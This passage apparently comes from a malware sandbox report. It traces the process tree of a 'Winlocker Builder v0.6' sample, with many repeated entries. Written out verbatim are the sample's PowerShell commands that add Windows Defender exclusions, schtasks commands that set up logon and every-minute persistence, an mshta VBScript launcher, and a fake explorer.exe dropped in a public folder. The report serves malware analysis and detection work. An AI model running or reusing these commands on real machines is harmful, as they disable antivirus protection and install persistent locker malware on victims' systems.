        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:832
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        51⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4460
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        51⤵
        
        PID:3532
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        49⤵
        Modifies registry class
        
        PID:3800
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        50⤵
        
        PID:3260
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        51⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:4924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        52⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4832
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        52⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2836
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        52⤵
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        50⤵
        
        PID:1760
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        51⤵
        
        PID:1248
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        52⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:2360
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        53⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2784
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        53⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3144
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        53⤵
        
        PID:908
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        51⤵
        
        PID:1028
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        52⤵
        
        PID:1360
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        53⤵
        Modifies visiblity of hidden/system files in Explorer
        
        PID:4316
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        54⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:256
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        54⤵
        
        PID:3496
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        54⤵
        
        PID:1712
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        52⤵
        Modifies registry class
        
        PID:2012
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        53⤵
        
        PID:3328
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        54⤵
        Modifies visiblity of hidden/system files in Explorer
        
        PID:4384
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        55⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4892
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        55⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2588
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        55⤵
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        53⤵
        
        PID:1212
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        54⤵
        
        PID:4024
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        55⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:2936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        56⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1440
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        56⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3752
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        56⤵
        
        PID:2176
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        54⤵
        Modifies registry class
        
        PID:3428
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        55⤵
        
        PID:3144
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        56⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:4060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        57⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:896
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        57⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1568
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        57⤵
        
        PID:2068
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        55⤵
        
        PID:3172
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        56⤵
        
        PID:2500
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        57⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:3204
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        58⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3836
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        58⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:244
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        58⤵
        
        PID:988
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        56⤵
        Modifies registry class
        
        PID:2952
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        57⤵
        
        PID:4716
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        58⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:3200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        59⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4924
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        59⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1604
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        59⤵
        
        PID:1324
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        57⤵
        
        PID:1368
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        58⤵
        
        PID:1440
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        59⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:4224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        60⤵
        
        PID:1540
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        60⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2868
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        60⤵
        
        PID:3428
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        58⤵
        
        PID:2064
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        59⤵
        
        PID:3568
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        60⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:2216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        61⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:832
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        61⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2992
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        61⤵
        
        PID:3296
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        59⤵
        
        PID:908
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        60⤵
        
        PID:4448
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        61⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:2748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        62⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1244
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        62⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1120
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        62⤵
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        60⤵
        
        PID:3584
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        61⤵
        
        PID:1164
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        62⤵
        Modifies visiblity of hidden/system files in Explorer
        
        PID:1444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        63⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4476
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        63⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2784
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        63⤵
        
        PID:1436
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        61⤵
        
        PID:2232
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        62⤵
        
        PID:1656
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        63⤵
        
        PID:2200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        64⤵
        
        PID:3300
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        64⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:652
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        64⤵
        
        PID:4080
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        62⤵
        
        PID:4580
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        63⤵
        
        PID:3468
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        64⤵
        
        PID:2660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        65⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3704
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        65⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3056
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        65⤵
        
        PID:1484
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        63⤵
        
        PID:1636
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        64⤵
        
        PID:1544
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        65⤵
        
        PID:1052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        66⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1012
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        66⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2044
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        66⤵
        
        PID:2024
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        64⤵
        
        PID:2012
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        65⤵
        
        PID:888
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        66⤵
        
        PID:3888
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        67⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1328
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        67⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2936
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        65⤵
        
        PID:4920

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:4948

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
1⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\explorer.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1704
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\explorer.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2932
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3356
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Public\explorer.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4828

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
- System Location Discovery: System Language Discovery
PID:2912

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:3344

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:1980

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:1528

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:4384

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:1996

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:3600

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:1872

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:3184

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:4116

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:3484

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:4808

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:3908

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
PID:3600

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:1868

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:1940

C:\Users\Public\explorer.exe
C:\Users\Public\explorer.exe
1⤵
- Executes dropped EXE
- Modifies registry class
PID:2300

C:\Windows\system32\mshta.exe
mshta.exe vbscript:Execute("on error resume next:CreateObject(""Wscript.Shell"").Run """"""C:\Windows\System32\WinLocker.lnk"""""",0:close")
1⤵
- Modifies registry class
PID:1108

C:\Windows\system32\mshta.exe
